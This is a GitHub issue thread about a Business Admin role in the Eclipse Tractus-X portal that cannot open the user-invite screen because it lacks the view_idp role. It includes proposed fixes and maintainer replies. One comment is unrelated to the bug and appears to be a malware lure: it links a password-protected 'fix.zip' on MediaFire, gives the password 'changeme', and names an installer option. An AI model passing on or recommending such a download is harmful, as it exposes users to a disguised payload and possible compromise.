### ISSUE TITLE
Portal | User Management | Business Admin | Add user not working

### ISSUE THREAD

**Issue by typecastcloud** [eclipse-tractusx/portal#417]
### Current Behavior
When logging in as Business Admin I have the permission to invite company users (see: [Permission Matrix](https://github.com/eclipse-tractusx/portal-assets/blob/v2.1.0/public/assets/images/content/PortalRoleAndPermissionMatrix.png)). The button is available and token contains role. 

Instead of opening user invite screen we get this error:
> We are sorry, it seems there's an issue with the identity call which blocks any further action on this function. Please try it later again. If the problem persist, consider to reach out to the platform administrator.

### Expected Behavior

Either
- Business Admin can invite users
Or
- Business Admin can't invite users (Permission Matrix is adjusted)

### Findings
- Business Admin has role `add_user_account`
- Business Admin does not have `view_idp` required to pass the "multiple IDP active" check, which is trying to access `administration/identityprovider/owncompany/identityproviders` endpoint.
### Proposals
Options:
- FE+BE: Remove "multiple IDP active" check and handle invites for multiple IDP in some other way
- BE: Add `add_user_account` role as alternative access role for `administration/identityprovider/owncompany/identityproviders`
- IAM: Add `view_idp` role to Business Admin -> allows BA to have access to Identity Provider Management (not listed in permission matrix) -> will affect frontend
- IAM: Remove `add_user_account`, `modify_user_account`, `view_client_roles` from Business Admin

### Steps To Reproduce

1. Create Business Admin
2. Go to User Management
3. Click on `Add user`
4. Check error message

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MaximilianHauer** [comment]
will be solved by https://github.com/eclipse-tractusx/portal-backend/issues/955

**Comment by typecastcloud** [comment]
> will be solved by [eclipse-tractusx/portal-iam#178](https://github.com/eclipse-tractusx/portal-iam/issues/178)

Ok
